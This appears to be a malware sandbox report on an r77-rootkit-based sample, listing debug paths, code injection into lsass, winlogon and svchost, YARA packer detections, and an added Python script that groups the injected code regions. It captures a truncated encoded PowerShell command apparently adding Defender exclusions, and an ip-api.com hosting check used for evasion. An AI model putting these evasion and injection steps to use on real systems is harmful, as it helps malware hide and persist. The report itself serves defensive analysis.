Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: C:\Users\user\Desktop\Install.exe, Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exe, Code function: 1_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exe, Code function: 1_2_0040290B FindFirstFileW,
Source: C:\Windows\System32\nslookup.exe, Code function: 22_2_0000000140006E1C FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exe, Code function: 39_2_00000001400073C8 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exe, Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exe, Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe, Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe, Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,

Networking

Source: C:\Users\user\AppData\Roaming\34432.exe, Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData0I
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp, String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryux
Source: global traffic, HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: powershell.exe, 00000008.00000002.303519748.000001FF69E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.467492973.000002C8EBA50000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.mp
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM
Source: AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ip-api.com4Uk
Source: Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmp, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownDNS traffic detected: queries for: ip-api.com
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary

Source: unknownProcess created: Commandline size = 2585
Source: unknownProcess created: Commandline size = 2578
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040755C
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406D85
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E405C20
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532148E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532C870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321587
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_053220F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09417560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09417570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F1958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F19B8
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140001000
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400011D0
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006C10
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005098
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000AABC
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000CAD8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F4640
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1D60
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401D60
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000558C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400071BC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000B2CC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000D2E8
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC4E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE2418
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD0800
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE0400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC2D8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD1660
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD01400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD13018
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD11000
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0CED8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD02260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C4E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C2D8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B81660
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B92418
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B80800
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B90400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBCED8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB2260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC3018
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB1400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC1000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE2418
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE0400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD0800
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC2D8
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD1660
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC4E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D01400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D02260
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D13018
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D11000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0CED8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF11660
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C4E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF22418
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF10800
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF20400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C2D8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF41400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF42260
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF53018
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF51000
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4CED8
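The twelve function addresses reported for winlogon.exe, lsass.exe and both svchost.exe instances differ only in their base: the distance between any two of them is the same in every process, which is the signature of one module injected at four different bases rather than four unrelated code regions. The script below is an added example, not part of the Joe Sandbox report. It parses those rows (copied from the list above, plus four dllhost.exe rows as a control), builds a base-independent layout signature per process and groups processes whose signatures match. The function names and the grouping logic are the editor's own; the only assumption is that the rows keep the report's `Source: <image>Code function: <pid>_<stage>_<address>` form.

```python
import re
from collections import defaultdict

# Rows copied from the report's "Code function" list (four dllhost rows kept as a control).
REPORT_ROWS = r"""
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000558C
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC4E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE2418
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD0800
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE0400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC2D8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD1660
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD01400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD13018
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD11000
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0CED8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD02260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C4E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C2D8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B81660
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B92418
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B80800
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B90400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBCED8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB2260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC3018
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB1400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC1000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE2418
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE0400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD0800
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC2D8
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD1660
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC4E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D01400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D02260
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D13018
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D11000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0CED8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF11660
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C4E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF22418
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF10800
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF20400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C2D8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF41400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF42260
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF53018
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF51000
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4CED8
"""

# "<image>Code function: <process index>_<stage>_<hex address>" as the report prints it.
ROW_RE = re.compile(r"Source: (?P<image>\S+?)Code function: (?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]+)")


def parse_rows(text):
    """Yield (process label, absolute address) for every Code function row."""
    for m in ROW_RE.finditer(text):
        yield f"{m['image'].rsplit(chr(92), 1)[-1]}[{m['pid']}]", int(m["addr"], 16)


def layout_signature(addrs):
    """Offsets of every function from the lowest one: independent of where the region was mapped."""
    base = min(addrs)
    return tuple(sorted(a - base for a in addrs))


def group_by_layout(text):
    """Map layout signature -> sorted list of processes that exhibit it."""
    per_proc = defaultdict(set)
    for label, addr in parse_rows(text):
        per_proc[label].add(addr)
    groups = defaultdict(list)
    for label, addrs in per_proc.items():
        groups[layout_signature(addrs)].append(label)
    return {sig: sorted(labels) for sig, labels in groups.items()}


def shared_implants(text, min_funcs=4):
    """Processes whose function layouts are identical: one module injected at several bases."""
    return [labels for sig, labels in group_by_layout(text).items()
            if len(labels) > 1 and len(sig) >= min_funcs]


if __name__ == "__main__":
    for labels in shared_implants(REPORT_ROWS):
        print("same code region in:", ", ".join(labels))
```

The signature survives ASLR and whatever address VirtualAllocEx hands out, because only differences between addresses are compared; it does break when the analyzer missed a function in one of the processes, so in a larger report compare signatures by common subset rather than strict equality.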
Source: Install.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Install.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 33.2.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.0.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.2.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.0.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.2.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
